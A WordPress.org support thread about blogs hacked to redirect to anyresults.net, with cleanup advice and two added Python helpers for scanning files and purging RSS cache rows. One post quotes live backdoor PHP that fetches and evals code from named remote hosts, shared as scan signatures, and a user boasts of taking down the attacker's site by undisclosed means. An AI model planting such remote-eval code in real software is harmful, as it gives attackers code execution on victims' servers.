WordPress.org


WordPress Hacked and Redirected ... Again (59 posts)

  1. whooami
    Member
    Posted 6 years ago #

    I thought I felt a shift in the force this morning!

    buahahha, it's early yet :P

  2. Bob Smith
    Member
    Posted 6 years ago #

    joni a site i have on my dedi that always had the latest version appears to have been hacked also. i also contacted his host and most of the affiliate programs i could find.

  3. Bob Smith
    Member
    Posted 6 years ago #

    ok - i got hacked by the redirect on my dedi on a blog which had the newest version of wp.

    using this:

    http://it.youtube.com/watch?v=Obqa6jDV-WQ

    (nice tutorial btw)

    i found the "old" file and deleted it - as well as the "rss ..." in wp_options.

    problem still there ... :(

    all other solutions i've come across don't help either.

    i can't even get angry anymore. i give up.

  4. macsoft3
    Member
    Posted 6 years ago #

    >the domain registrar just told me they would do nothing without a court order

    Why are you contacting the domain registrar? Is there anything wrong with anyresults.net's WhoIs info?

  5. Bob Smith
    Member
    Posted 6 years ago #

    i contacted isp, registrar, affiliate programs. sure it was a shotgun approach, but i was upset understandably.

  6. polimaker
    Member
    Posted 6 years ago #

    In all fairness to WP, if my blog got hacked the first person who would be feeling my wrath would be my hosting provider for having crappy security on my server. Quite frankly, unless you're downloading stuff willy-nilly to your server (you're not doing that, right?) your hosting provider should be providing enough security to protect you from random hacks.

    As far as fixing your current problem, if all else fails I'd suggest going nuclear. Use the "export" function to create an XML file of your posts and pages, and delete everything on your server. Start over with fresh copies of WP and your plugins. And while you're at it, look for a new hosting provider.

  7. Joni
    Member
    Posted 6 years ago #

    Idiots abound and they all have web hosting accounts nowadays. Everyone wants a freaking google adsense account so they can retire from the riches their shiny new WP blog will bring them. WP is the new AOL. Do these new bloggers bother to learn anything about security? Half of them can't even find the damn WP dashboard. It's enough to make you cry.

    So, simply put, you're only as secure as the dumbest idiot who shares server space with you and lord knows what he's doing. That's enough to keep me awake at night.

  8. Bob Smith
    Member
    Posted 6 years ago #

    polimaker, i bet i can find a blog that's been hacked with every provider.

    i can't imagine the amount of blogs that have been affected. in the normal course of my googling i have come across many affected by the same hack.

    this is the first hack i have ever suffered in all the years i've been running sites. i guess there is a first time for everything unfortunately ...

  9. Bob Smith
    Member
    Posted 6 years ago #

    jonimueller, your only solution is to blame us for not having the newest version installed as well as using shared hosting.

    well i got the hack on a blog on my dedi with the latest version installed.

    i recommend you stfu unless you have anything new or constructive to say.

  10. Joni
    Member
    Posted 6 years ago #

    Nope, that's not my only solution. You clearly don't read. Or if you read, you don't comprehend. And that falls under CNMP. So you can ignore me all day and all night if you want to. Can't shut me up tho. Nice try. And stop taking your frustration out on people on this forum. It really doesn't help anything and makes you look like a jackass.

    And in all of your rantings and ravings about your "dedi" did you REPORT the breach to security@wordpress.org as you were told to do more than once? Hmm?
    http://wordpress.org/support/topic/180772?replies=40%23post-777019#post-776783

  11. Bob Smith
    Member
    Posted 6 years ago #

    yes it was reported to them already. i have nothing more to say to you. please quit replying to my posts and i'll do the same. others have been putting forth solutions and i appreciate it.

  12. whooami
    Member
    Posted 6 years ago #

    >polimaker, i bet i can find a blog that's been hacked with every provider.

    and I'll bet you can't. But that's neither here nor there.

    --

    if you want to do something proactive rather than sit here and whine all day (I'm sorry but that's pretty much all you've done in this thread) -- why don't you go through your server logs for any suspicious $GET_s -- then when you're done with that, why don't you start logging $POST_s. There are only two ways someone can access your site, using a GET or using a POST, and both methods are very transparent.

  13. Babak
    Member
    Posted 6 years ago #

    Just spoke with technical support at the host for anyresult.net - http://www.isprime.com

    I gave them the URL for this thread and asked them to take appropriate measures. The person I spoke with requested a "ticket" but since I'm not a client there is no point in submitting one.

    In any case, the ball is in their court now if they want to actually do something about this.

    For others who may want to call them: 1-800-502-4678 x3 for tech support

  14. Babak
    Member
    Posted 6 years ago #

  15. macsoft3
    Member
    Posted 6 years ago #

    We have destroyed several dozen websites in the past year. So let me give you a few tips. I mentioned the name of isprime.com earlier. It's a web hosting company, not a domain registrar or suspect's network company (ISP). Babak may have made a right approach by contacting isprime.com only if his website has also been victimized and if visitors to his website are redirected to the website of anyresults.net. In other words, only the webmasters of the victimized websites should contact isprime.com and give the exact URLs where visitors are redirected to the website of anyresults.net.

    Contacting the owner of the affiliate program usually does nothing. That's because many of them only want money and want to hire as many idiots as possible.

  16. Bob Smith
    Member
    Posted 6 years ago #

    whooami, all i have done all week is tried the various solutions i have come across in my surfing on the net.

    yes i do come here periodically and "whine" but that has in between a very steep learning curve about databases and such. i admit i am not a database guru, but i am extremely proficient at other things doing the best i can while i learn ....

    yeah thanks Babak, i contacted i think abuse@isprime.com and they are looking into it - but you i know these hacking dirtbags will just move to a new isp when shut down ... at least we tried right?

  17. whooami
    Member
    Posted 6 years ago #

    that's fine, Bob.

    You indicated this happened on a fresh install -- if that's the case, what do you expect to gain by doing stuff (changing files around as you indicated in another thread, for instance) you find on the web? <-- that's a rhetorical q.

    In other words, what you probably ought to be doing is looking for the point of entry.

    I'm not knocking your efforts, don't misunderstand, I just think you're missing, we are all missing a great opportunity.

    Again, I am willing to help -- just drop me a note.

  18. EverMaster
    Member
    Posted 6 years ago #

    Those are VERY dangerous:

    Make sure you scan ALL your files for the following words in your code:

    if(isset($_GET['p'])) {
        $sock = @fsockopen('km20725.keymachine.de', 80);
        if($sock){
        fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
        fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
        while($content[] = fgets ($sock));
        $content = implode('', $content);
        @eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
        fclose ($sock);}
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }
    if(isset($_GET['p'])) {
        @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
    }

    eval(gzinflate(base64_decode(

    words:

    k1b0rg in any of your files.

    Once found clean it up!

    hey and don't forget to send nice abuse emails to ISP of those guys:

    km20725.keymachine.de
    beliy.us
    seogoogle.us
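
The file sweep described in the post above, as an added example that is not part of the original post or of WordPress: it walks a directory tree and reports the file and line where the posted strings occur. The regular expressions are this example's own generalisation of the posted snippets, and the sample tree and the host `remote.example` are constructed.

```python
import re
import tempfile
from pathlib import Path

# Patterns derived from the strings in the post; whitespace-tolerant.
# "fsockopen-to-host" is a heuristic and can match legitimate code.
SIGNATURES = {
    "eval-gzinflate-base64": re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I),
    "eval-remote-fetch": re.compile(rb"eval\s*\(\s*@?\s*file_get_contents\s*\(\s*['\"]https?://", re.I),
    "fsockopen-to-host": re.compile(rb"fsockopen\s*\(\s*['\"][\w.-]+['\"]", re.I),
    "k1b0rg-marker": re.compile(rb"k1b0rg", re.I),
}

def scan_file(path):
    """Return (line_number, signature_name) pairs for one file."""
    hits = []
    with open(path, "rb") as fh:
        for lineno, line in enumerate(fh, 1):
            for name, rx in SIGNATURES.items():
                if rx.search(line):
                    hits.append((lineno, name))
    return hits

def scan_tree(root, suffixes=(".php", ".inc", ".phtml", ".js")):
    """Walk root and map relative path -> hits, only for files with findings."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_file(path)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def build_sample_tree(root):
    """Constructed sample files (inert text) standing in for a WordPress tree."""
    root = Path(root)
    (root / "wp-content").mkdir()
    (root / "index.php").write_text("<?php\nrequire('./wp-blog-header.php');\n")
    (root / "wp-content" / "old.php").write_text(
        "<?php\n@eval( @file_get_contents('http://remote.example/x?p='.$_GET['p']));\n")
    (root / "wp-content" / "cache.php").write_text(
        "<?php /* k1b0rg */\neval(gzinflate(base64_decode('AAAA')));\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, hits in scan_tree(build_sample_tree(tmp)).items():
            print(rel, hits)
```

The scan is line by line, so a signature split across two lines is not reported; a clean result is not proof that a tree is clean.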

  19. Babak
    Member
    Posted 6 years ago #

    WTF is anyresults.net still up? and the same host? how can any host be so negligible?

  20. deanc
    Member
    Posted 6 years ago #

    I can't even log in... and when I request a new password it won't even work.

    Has anyone experienced this? I'm reading here that people are trying all types of things to fix it... i'm jealous... I can't even log in to start the healing process!

    Looking forward to someone's reply asap!

    Thanks

  21. Bob Smith
    Member
    Posted 6 years ago #

    ok - just went through the steps found in this article:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    problem is still there on one of my blogs. are there any new tips out there that i can try? thanks in advance.

  22. RosieMBanks
    Member
    Posted 6 years ago #

    i gave up. no one in the wordpress community cares about helping someone hacked by their buggy shit cms. i used to love them, but now i know why so many experienced webmasters think wp is shit.

    Here's your hat. What's your hurry?

  23. macsoft3
    Member
    Posted 6 years ago #

    >WTF is anyresults.net still up? and the same host? how can any host be so negligible?

    It's now hosted in China.

  24. macsoft3
    Member
    Posted 6 years ago #

    All right. I decided to give you extended help in destroying the website at the domain of anyresults.net. I won't mention what I did. I can tell you that the criminal organization behind that website made a crucial mistake. Hopefully, this website will disappear from the face of Earth within 2 weeks or so. What a dumb group of criminals...

  25. VRocKs
    Member
    Posted 6 years ago #

    I did something bad once... It had to do with comments and moving my site to #1 in Google.

    My site was removed from my server within 2 days and GoDaddy.com canceled my account with them and made getting my domains back from them almost impossible. Took months to get them back.

    I guess things are a lot different now.

  26. Beer
    Member
    Posted 6 years ago #

    10 Results for 64.111.199.183

    1stguide.org
    Sponsoring Registrar:EstDomains, Inc.
    "EstDomains" - Always a good bet that this domain will be used for spam/hacking.

    anyresults.net
    Creation Date: 03-Jun-2008
    Must be a new hack? The domain wasn't registered until a week ago.

    buyd.org
    cureaworld.biz
    estbs.info
    gyla-4.info
    optha.info
    pilul.org
    roens.info
    thewaycool.biz

    AnyResults.net uses a FindWhat.com feed.
    FindWhat.com is: Miva Corporation
    +1.2395617229
    5220 Summerlin Commons Blvd.
    Suite 500
    Fort Myers, FL 33907

    Call or write them and they may terminate without payment. There's no way they would have paid them in 1 week already probably.

    Email sam.miller@miva.com or call toll free (888) 648-2237
    http://www.miva.com/us/content/partners/miva_mc/

  27. Bob Smith
    Member
    Posted 6 years ago #

  28. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    BTW, it is totally safe to delete ALL of the rss_bigStringOfRandomGibberish lines. These are the caches for the RSS feeds/widgets, and if they are not found, then they will simply be reloaded on the next run through. It will recreate them if they're missing, is my point. So kill them all.

    Only get the ones with the gibberish though. There are rss_options and similar things as well which you should not delete.
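
The selective cleanup described in the post above, as an added example that is not part of the original post or of WordPress: it deletes only the `rss_` rows whose name ends in a hash and leaves `rss_options` and similar settings in place. It assumes the "gibberish" is a 32-character hex hash with an optional `_ts` suffix, and uses an in-memory SQLite table with constructed rows as a stand-in for the MySQL `wp_options` table.

```python
import re
import sqlite3

# Assumption: cache rows are named rss_<32 hex chars>, optionally with "_ts".
# Any other rss_ name (rss_options and similar) is never matched.
CACHE_NAME = re.compile(r"^rss_[0-9a-f]{32}(_ts)?$")

# Constructed rows standing in for wp_options (names and values are made up).
SAMPLE_ROWS = [
    ("siteurl", "http://blog.example"),
    ("rss_options", "keep-me"),
    ("rss_use_excerpt", "0"),
    ("rss_0123456789abcdef0123456789abcdef", "cached feed body"),
    ("rss_0123456789abcdef0123456789abcdef_ts", "1213000000"),
    ("rss_fedcba9876543210fedcba9876543210", "unexpected content"),
]

def make_sample_db():
    """In-memory SQLite table used as a stand-in for MySQL wp_options."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_options (option_name TEXT PRIMARY KEY, option_value TEXT)")
    db.executemany("INSERT INTO wp_options VALUES (?, ?)", SAMPLE_ROWS)
    return db

def purge_rss_cache(db):
    """Delete only hash-named rss_ rows; return (deleted, kept_rss) name lists."""
    # LIKE is only a coarse prefix filter; the regex decides what is deleted.
    names = [row[0] for row in db.execute(
        "SELECT option_name FROM wp_options "
        "WHERE option_name LIKE 'rss%' ORDER BY option_name")]
    doomed = [n for n in names if CACHE_NAME.match(n)]
    with db:  # one transaction: the deletions commit together or not at all
        db.executemany("DELETE FROM wp_options WHERE option_name = ?",
                       [(n,) for n in doomed])
    return doomed, [n for n in names if n not in doomed]

if __name__ == "__main__":
    deleted, kept = purge_rss_cache(make_sample_db())
    print("deleted:", deleted)
    print("kept:", kept)
```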

  29. macsoft3
    Member
    Posted 6 years ago #

    As I promised before, the website at the domain of anyresults.net is now dead.

Topic Closed

This topic has been closed to new replies.
